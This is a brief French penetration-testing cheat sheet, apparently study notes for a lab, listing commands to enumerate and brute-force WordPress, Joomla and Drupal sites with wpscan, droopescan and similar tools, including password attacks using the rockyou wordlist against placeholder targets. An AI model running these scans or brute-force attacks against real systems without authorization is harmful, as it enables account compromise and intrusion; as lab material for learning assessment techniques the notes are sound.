Exploitation d'application
WordPress
sudo wpscan --url http://<machine_ip> --e --api-token 'jjj'
sudo wpscan --password-attack xmlrpc -t 20 -U user -P /usr/share/wordlists/rockyou.txt --url http://<machine_ip>Joomla
plugins/system/cache/cache.xml
administrator/index.php
droopescan scan joomla --url http://<machine_ip>/
python joomlascan.py -u http://<machine_ip>
python joomla-brute.py -u http://<machine_ip> -w rockyou.txt -usr adminDrupal
CHANGELOG.txt
README.txtdroopescan scan drupal -u http://drupal.inlanefreight.localTomcat
GitLab
Mis à jour